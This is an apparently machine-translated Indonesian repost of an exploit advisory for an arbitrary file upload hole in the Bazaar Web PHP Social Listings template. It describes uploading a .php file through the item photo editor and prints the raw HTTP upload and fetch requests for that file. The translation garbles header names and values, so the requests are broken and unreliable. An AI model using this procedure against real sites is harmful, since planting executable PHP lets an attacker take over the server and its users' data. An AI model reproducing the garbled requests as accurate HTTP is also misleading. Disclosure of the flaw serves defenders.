Bazaar Web PHP Social Listings Shell Upload

  • Whatsapp
MTPutty 1.0.1.21 Pengungkapan Kata Sandi SSH
MTPutty Pengungkapan Kata Sandi SSH

News.nextcloud.asia

<--

# Judul Eksploitasi: Bazaar Web PHP Daftar Sosial Unggah File Sewenang-wenang
# Google Dork: T/A
# Tanggal: 19/12/2021
# Eksploitasi Penulis: Sohel Yousef – [email protected]
# Tautan Perangkat Lunak: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Demo Perangkat Lunak: https://xserver.app/__apps/bazaar-web/index.php#
# Kategori: aplikasi web

1. Deskripsi

Script Bazaar Web PHP Social Listings berisi unggahan file sewenang-wenang
pengguna terdaftar dapat mengunggah file .php di bagian Edit item tanpa
keamanan apa pun

daftar item tautan:

localhost bazaar-web/list-item-info.php

edit foto item dan unggah file php dan periksa elemen php Anda
arah

arah file yang diunggah

bazaar host lokal/upload/fileanda.php

cukup klik kanan foto dan gunakan elemen inspeksi yang akan Anda dapatkan
arah

Tuan rumah: (Pembawa Acara)

Menerima: */*

Terima-Bahasa: ar,en-US;q=0.7,en;q=0.3

Terima-Encoding: gzip, deflate, br

X-Diminta-Dengan: XMLHttpRequest

Content-Type: multipart/form-data; batas=—————————4745077911254302601850437199

Konten-Panjang: 63132

Koneksi: tetap hidup

Referensi: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Kuki: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1 AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1 PHPSESSID=o0it0cquadspsgh864fr4mvtrt

Detik-Ambil-Tujuan: kosong

Sec-Fetch-Mode: hati

Situs-Ambil Detik: asal yang sama

file=fx.php&fileName=fx.php

DAPATKAN
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php

Tuan rumah: HOST

Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Terima: gambar/avif,gambar/webp,*/*

Terima-Bahasa: ar,en-US;q=0.7,en;q=0.3

Terima-Encoding: gzip, deflate, br

Koneksi: tetap hidup

Referensi: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Cookie: AWSALB = Zl / BprqEgbVqCknGhgr3fTBKhe + vxhq2WkKOn6NZEvstF659 / bY85gK5a9rehQC9ejX8mXIhp / F5HoMd7iiNXUs0PKBGysX6kGrjeS2Zwwb AWSALBCORS = Zl / BPrqEgbVqCknGhgr3fTBKhe + vxhq2WkKOn6NZEvstF659 / bY85gK5a9rehQC9ejX8mXIhp / F5HoMd7iiNXUs0PKBGysX6kGrjeS2Zn PHPSESSID = o0it0cquadspsgh864fr4mvtrt

Detik-Ambil-Tujuan: gambar

Sec-Fetch-Mode: tanpa hati

Situs-Ambil Detik: asal yang sama

#####

–>

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *